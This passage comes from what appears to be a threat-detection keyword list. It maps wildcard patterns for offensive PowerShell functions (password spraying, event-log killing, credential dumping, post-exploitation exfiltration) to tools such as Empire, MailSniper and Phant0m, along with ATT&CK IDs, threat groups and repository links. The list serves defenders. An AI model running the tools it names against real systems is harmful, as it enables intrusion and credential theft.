Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1146,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PasswordSpray*,offensive_tool_keyword,MailSniper,Invoke-PasswordSpray* will attempt to connect to an * portal and perform a password spraying attack using a userlist and a single password.,T1114 T1550 T1555 T1212 T1558 T1110,N/A,N/A,N/A,Exploitation tools,https://github.com/dafthack/MailSniper,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-PasswordSprayEAS*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-PasswordSprayEWS*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-PasswordSprayGmail*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-PasswordSprayOWA*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-PatchDll*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-BypassUAC.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PatchDll*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-PSInject.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PatchDll*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Phant0m*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-Phant0m*,offensive_tool_keyword,cobaltstrike,Aggressor script to integrate Phant0m with Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/p292/Phant0m_cobaltstrike,1,1,N/A,10,10,26,13,2017-06-08T06:42:18Z,2017-06-08T06:39:07Z -*Invoke-Phant0m*,offensive_tool_keyword,Invoke-Phant0m,This script walks thread stacks of Event Log Service process (spesific svchost.exe) and identify Event Log Threads to kill Event Log Service Threads. So the system will not be able to collect logs and at the same time the Event Log Service will appear to be running. I have made this script for two reasons. First. This script will help to Red Teams and Penetration Testers. Second. 
I want to learn Powershell and Low-Level things on Powershell for cyber security field,T1059 - T1086 - T1216,TA0007 - TA0008,N/A,N/A,Defense Evasion,https://github.com/hlldz/Invoke-Phant0m,1,0,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*Invoke-Phant0m*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*Invoke-Phant0m.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-Phant0m.ps1*,offensive_tool_keyword,cobaltstrike,Aggressor script to integrate Phant0m with Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 
Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/p292/Phant0m_cobaltstrike,1,1,N/A,10,10,26,13,2017-06-08T06:42:18Z,2017-06-08T06:39:07Z -*Invoke-Phant0m.ps1*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,1,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*invoke-pipekat *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-Piper*,offensive_tool_keyword,invoke-piper,Forward local or remote tcp ports through SMB pipes.,T1003.001 - T1048 - T1021.002 - T1021.001 - T1090,TA0002 -TA0006 - TA0008,N/A,N/A,Lateral movement,https://github.com/p3nt4/Invoke-Piper,1,1,N/A,N/A,3,284,60,2021-03-07T19:07:01Z,2017-08-03T08:06:44Z -*Invoke-PiperClient*,offensive_tool_keyword,invoke-piper,Forward local or remote tcp ports through SMB pipes.,T1003.001 - T1048 - T1021.002 - T1021.001 - T1090,TA0002 -TA0006 - TA0008,N/A,N/A,Lateral movement,https://github.com/p3nt4/Invoke-Piper,1,1,N/A,N/A,3,284,60,2021-03-07T19:07:01Z,2017-08-03T08:06:44Z -*Invoke-PiperServer*,offensive_tool_keyword,invoke-piper,Forward local or remote tcp ports through SMB pipes.,T1003.001 - T1048 - T1021.002 - T1021.001 - T1090,TA0002 -TA0006 - TA0008,N/A,N/A,Lateral 
movement,https://github.com/p3nt4/Invoke-Piper,1,1,N/A,N/A,3,284,60,2021-03-07T19:07:01Z,2017-08-03T08:06:44Z -*Invoke-PipeShell.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-PortBind*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - 
Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerBreach.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-Portscan*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-PortScan*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,0,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*Invoke-Portscan*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-Portscan.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PortScan*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-Portscan*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-Portscan.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-Portscan.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1081,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PoshRatHttp*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*Invoke-PoshRatHttp*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PoshRatHttps*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PostExfil*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-PostExfil.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PostExfil*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1142,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PowerDump*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*Invoke-PowerDump*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PowerDump*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and 